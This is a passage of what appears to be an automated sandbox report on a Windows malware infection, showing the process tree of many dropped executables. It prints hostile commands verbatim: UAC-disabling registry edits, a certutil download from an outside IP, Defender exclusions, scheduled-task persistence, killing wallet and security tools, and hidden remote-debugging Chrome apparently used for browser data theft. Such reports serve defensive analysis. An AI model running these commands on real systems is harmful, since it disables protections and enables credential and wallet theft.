              cmd: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
            [7] C:\Windows\system32\reg.exe  (PID 1768)
                cmd: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
          [6] C:\Windows\System32\cmd.exe  (PID 64)
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
            [7] C:\Windows\system32\schtasks.exe  (PID 1252)
                cmd: schtasks /delete /f /tn "Windows Upgrade Manager"
        [5] C:\Users\Admin\AppData\Local\Temp\2963921430.exe  (PID 644)
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Local\Temp\1975213000.exe  (PID 8128)
            - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe  (PID 1268)
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe  (PID 2816)
          - Adds Run key to start application
          - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe  (PID 1380)
            - Executes dropped EXE
        [5] C:\ProgramData\Synaptics\Synaptics.exe  (PID 2208)
            cmd: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\msf.exe  (PID 5956)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe  (PID 7628)
        - Executes dropped EXE
        - Adds Run key to start application
    [3] C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe  (PID 6796)
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\system32\cmd.exe  (PID 4412)
          cmd: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\70FB.tmp\710C.tmp\710D.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
        [5] C:\Windows\system32\mshta.exe  (PID 6620)
            cmd: mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
            - Checks computer location settings
            - Access Token Manipulation: Create Process with Token
          [6] C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE  (PID 7304)
              cmd: "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
              - Executes dropped EXE
            [7] C:\Windows\system32\cmd.exe  (PID 9616)
                cmd: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\950D.tmp\955D.tmp\955E.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
                - Enumerates connected drives
              [8] C:\Windows\system32\reg.exe  (PID 9416)
                  cmd: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                  - UAC bypass
              [8] C:\Windows\system32\reg.exe  (PID 9272)
                  cmd: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                  - UAC bypass
              [8] C:\Windows\system32\reg.exe  (PID 6904)
                  cmd: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                  - UAC bypass
              [8] C:\Windows\system32\attrib.exe  (PID 7504)
                  cmd: attrib +s +h e:\net
                  - Sets file to hidden
                  - Views/modifies file attributes
              [8] C:\Windows\system32\certutil.exe  (PID 6744)
                  cmd: certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
              [8] C:\Windows\system32\certutil.exe  (PID 10756)
                  cmd: certutil -urlcache * delete
              [8] C:\Windows\system32\schtasks.exe  (PID 6476)
                  cmd: SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
                  - Scheduled Task/Job: Scheduled Task
              [8] C:\Windows\system32\timeout.exe  (PID 8728)
                  cmd: TIMEOUT /T 100
                  - Delays execution with timeout.exe
    [3] C:\Users\Admin\AppData\Local\Temp\Files\2.exe  (PID 6468)
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe  (PID 9088)
        - Executes dropped EXE
      [4] C:\Windows\SYSTEM32\schtasks.exe  (PID 5368)
          cmd: "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
          - Scheduled Task/Job: Scheduled Task
      [4] C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe  (PID 9336)
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
        [5] C:\Windows\SYSTEM32\schtasks.exe  (PID 9644)
            cmd: "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
            - Scheduled Task/Job: Scheduled Task
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe  (PID 7888)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\explorer.exe  (PID 11476)
        - Checks computer location settings
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 8984)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\explorer.exe'
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 8096)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 6388)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 9796)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\schtasks.exe  (PID 8876)
          cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
      [4] C:\Windows\SysWOW64\WerFault.exe
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 11476 -s 2976
          - Program crash
PID:9052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"3⤵
- Executes dropped EXE
PID:6728
-
-
C:\Users\Admin\AppData\Local\Temp\Files\def.exe"C:\Users\Admin\AppData\Local\Temp\Files\def.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:11044
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7068 -
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"4⤵
- Executes dropped EXE
PID:2156
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Sentil.exe"C:\Users\Admin\AppData\Local\Temp\Files\Sentil.exe"3⤵
- Executes dropped EXE
PID:6912 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6612
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:6664 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:7080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:9628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit4⤵PID:9296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8840 -
C:\Users\Admin\AppData\Local\Temp\1713315379.exeC:\Users\Admin\AppData\Local\Temp\1713315379.exe4⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:10840 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Suspicious behavior: SetClipboardViewer
PID:7496 -
C:\Users\Admin\AppData\Local\Temp\147585972.exeC:\Users\Admin\AppData\Local\Temp\147585972.exe6⤵
- Checks computer location settings
PID:11592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:11940
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:11848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:11888
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:11820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\982626737.exeC:\Users\Admin\AppData\Local\Temp\982626737.exe6⤵PID:12028
-
-
C:\Users\Admin\AppData\Local\Temp\2750020248.exeC:\Users\Admin\AppData\Local\Temp\2750020248.exe6⤵
- System Location Discovery: System Language Discovery
PID:1504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:11032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7508
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- System Location Discovery: System Language Discovery
PID:6272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ghost_0x000263826B9A9B91.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ghost_0x000263826B9A9B91.exe"3⤵PID:11356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"3⤵PID:12056
-
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"4⤵
- Loads dropped DLL
PID:6200 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM ArmoryQt.exe5⤵
- Kills process with taskkill
PID:11156
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM "Atomic Wallet.exe"5⤵
- Kills process with taskkill
PID:9888
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM bytecoin-gui.exe5⤵
- Kills process with taskkill
PID:10316
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Coinomi.exe5⤵
- Kills process with taskkill
PID:9172
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Element.exe5⤵
- Kills process with taskkill
PID:1420
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Exodus.exe5⤵
- Kills process with taskkill
PID:6256
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Guarda.exe5⤵
- Kills process with taskkill
PID:2208
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM KeePassXC.exe5⤵
- Kills process with taskkill
PID:7852
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM NordVPN.exe5⤵
- Kills process with taskkill
PID:5728
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM OpenVPNConnect.exe5⤵
- Kills process with taskkill
PID:7756
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM seamonkey.exe5⤵
- Kills process with taskkill
PID:7432
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Signal.exe5⤵
- Kills process with taskkill
PID:8136
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla.exe5⤵
- Kills process with taskkill
PID:8440
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla-server-gui.exe5⤵
- Kills process with taskkill
PID:7068
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM keepassxc-proxy.exe5⤵
- Kills process with taskkill
PID:6276
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM nordvpn-service.exe5⤵
- Kills process with taskkill
PID:11096
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM steam.exe5⤵
- Kills process with taskkill
PID:3160
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM walletd.exe5⤵
- Kills process with taskkill
PID:11204
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM waterfox.exe5⤵
- Kills process with taskkill
PID:3088
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Discord.exe5⤵
- Kills process with taskkill
PID:10644
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM DiscordCanary.exe5⤵
- Kills process with taskkill
PID:10764
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM burp.exe5⤵
- Kills process with taskkill
PID:9248
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Ethereal.exe5⤵
- Kills process with taskkill
PID:5432
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM EtherApe.exe5⤵
- Kills process with taskkill
PID:10292
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM fiddler.exe5⤵
- Kills process with taskkill
PID:10056
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerSvc.exe5⤵
- Kills process with taskkill
PID:10168
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerUI.exe5⤵
- Kills process with taskkill
PID:1492
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM snpa.exe5⤵
- Kills process with taskkill
PID:9556
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM solarwinds.exe5⤵
- Kills process with taskkill
PID:2564
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM tcpdump.exe5⤵
- Kills process with taskkill
PID:2476
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telerik.exe5⤵
- Kills process with taskkill
PID:6940
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM wireshark.exe5⤵
- Kills process with taskkill
PID:11092
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM winpcap.exe5⤵
- Kills process with taskkill
PID:10324
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telegram.exe5⤵
- Kills process with taskkill
PID:1156
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9464
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:11016
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:10908 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:11068
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:10256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:4312
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6460 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:8480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1780,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1920 /prefetch:26⤵PID:4792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1968,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1976 /prefetch:36⤵PID:7344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2072,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1984 /prefetch:86⤵PID:8256
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:2972
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9332 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:5140
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:5492 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:6712
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:8748 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:7216
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:4064 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:10324
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"3⤵PID:8224
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8224 -s 1404⤵PID:8348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"3⤵PID:7900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7900 -s 2284⤵
- Program crash
PID:8608
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"3⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 12564⤵
- Program crash
PID:9836
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7048
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7104
-
-
C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"3⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:7556
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL4⤵PID:3936
-
